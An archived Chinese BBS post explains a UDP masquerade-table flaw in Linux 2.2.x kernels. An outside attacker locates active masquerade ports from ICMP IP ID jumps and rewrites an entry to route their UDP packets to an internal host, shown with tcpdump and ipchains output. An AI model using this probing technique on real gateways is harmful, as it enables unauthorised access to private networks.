发信人: make_chang()
整理人: ipaq(2001-05-27 14:37:24), 站内信件
|
Linux系统2.2.x内核的IP伪装实现中存在严重安全漏洞。在相关的核心代码中对
连接情况缺
乏认真的检查。攻击者可以重写核心中UDP伪装表项,使攻击者的UDP包可以被路
由进内部机
器。
当一个内部IP要访问外部网络的DNS服务器时,当发送的UDP包经过IP伪装网关时
,内核会添
加一个表项来记录这个连接。比如从内部主机A的1035端口连往外部主机C的53端
口的一个UDP
包,内核将这个包的源地址替换成伪装网关(B)的IP,源端口设置成网关上为此连
接分配的一个
端口,缺省是从61000端口到65096端口,因此理论上可以核心同时处理4096个TC
P/UDP伪装连接。
Host A:1035 -> GW B:63767 -> Host C:53
当外部网络发送一个UDP包到伪装网关时,Linux IP伪装只根据目标端口来决定是
否应该将这个
UDP包转发到内部网络。如果目标端口在已经建立的伪装连接表中有对应表项,它
就会将此包中
的源ip和源端口更新相应表项的远程主机ip和端口。攻击者只要判断伪装网关的
的端口就可能
用自己的ip和端口来重写伪装连接表。伪装网关用来为伪装连接服务的端口范围
通常是从61000
到65096,因此外部攻击者很容易判断哪些端口已经被用来建立连接。攻击者可以
向伪装网关的这
些端口发送UDP检测包,然后检查端口的ICMP应答包的IP ID。每个主机每发一个
包,它的TCP/IP
栈中的IP ID会递增一。因此对于用于ip伪装的端口所发会的ICMP应答中将会有内
部主机的IP ID.
这个ID通常会与网关主机的当前IP ID相差很多,通常都在1000以上。下面的例子
就显示了利用
弱点进行攻击的过程:
主机 A 是内部主机 (192.168.1.100)
主机 B 是伪装网关 (192.168.1.1 / 10.0.0.1)
主机 C 是一台外部DNS服务器 (10.0.0.25)
主机 X 是外部攻击者的IP (10.10.187.13)
进行检测之前,在伪装网关上执行命令:ipchains -L -M -n 来显示当前伪装连
接表的情况:
> UDP 03:39.21 192.168.1.100 10.0.0.25 1035 (63767) -> 53
目前是从192.168.1.100的1035端口发往10.0.0.25的53端口的连接,伪装端口是
63767
[ 从攻击者的机器上进行tcpdump得到的结果]
(为了更容易的看清楚问题,这里我们设置所有检测用的包的源端口为12345 )
[ 我们的检测将从61000端口开始,我们略掉了前面的一些结果 ]
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63762 unreachable [to
s 0xd8] (ttl 245, id 13135)
10.10.187.13.12345 > 10.0.0.1.63763: udp 0 (DF) [tos 0x18] (ttl 254, i
d 23069)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63763 unreachable [to
s 0xd8] (ttl 245, id 13136)
10.10.187.13.12345 > 10.0.0.1.63764: udp 0 (DF) [tos 0x18] (ttl 254, i
d 23070)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63764 unreachable [to
s 0xd8] (ttl 245, id 13137)
10.10.187.13.12345 > 10.0.0.1.63765: udp 0 (DF) [tos 0x18] (ttl 254, i
d 23071)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63765 unreachable [to
s 0xd8] (ttl 245, id 13138)
10.10.187.13.12345 > 10.0.0.1.63766: udp 0 (DF) [tos 0x18] (ttl 254, i
d 23074)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63766 unreachable [to
s 0xd8] (ttl 245, id 13139)
10.10.187.13.12345 > 10.0.0.1.63767: udp 0 (DF) [tos 0x18] (ttl 254, i
d 23083)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63767 unreachable [to
s 0xd8] (ttl 244, id 17205)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
上面这个包的ID是17205,它与13139相差已经超过4000了,这就是说,我们发现了
一个经过伪装的连接。!!!
10.10.187.13.12345 > 10.0.0.1.63768: udp 0 (DF) [tos 0x18] (ttl 254, i
d 23084)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63768 unreachable [to
s 0xd8] (ttl 245, id 13140)
10.10.187.13.12345 > 10.0.0.1.63769: udp 0 (DF) [tos 0x18] (ttl 254, i
d 23088)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63769 unreachable [to
s 0xd8] (ttl 245, id 13141)
10.10.187.13.12345 > 10.0.0.1.63770: udp 0 (DF) [tos 0x18] (ttl 254, i
d 23090)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63770 unreachable [to
s 0xd8] (ttl 245, id 13142)
10.10.187.13.12345 > 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, i
d 23091)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63771 unreachable [to
s 0xd8] (ttl 245, id 13143)
10.10.187.13.12345 > 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, i
d 23092)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63772 unreachable [to
s 0xd8] (ttl 245, id 13144)
[ 我们的检测到65096端口结束,我们省略了一些结果 ]
现在我们再来检查一下伪装网关的伪装连接表的情况:
ipchains -L -M -n
> UDP 04:35.12 192.168.1.100 10.10.187.13 1035 (63767) -> 12345
可以看到,现在远程主机已经换成了攻击者的ip:10.10.187.13,目标端口也换成
了攻击者
检测用的源端口:12345
现在攻击者就可以从12345源端口发送UDP数据给内部主机的1035端口了。
--
我是为你落入人间的麒麟。不求得到很多的回报,只求得到可爱的微笑
我是为你落入人间的麒麟。不求得到很多的回报,只求得到可爱的微笑
我是为你落入人间的麒麟。不求得到很多的回报,只求得到可爱的微笑
※ 来源:.月光程序代码网 http://www.moon-soft.com.[FROM: 203.93.7.45]
|
|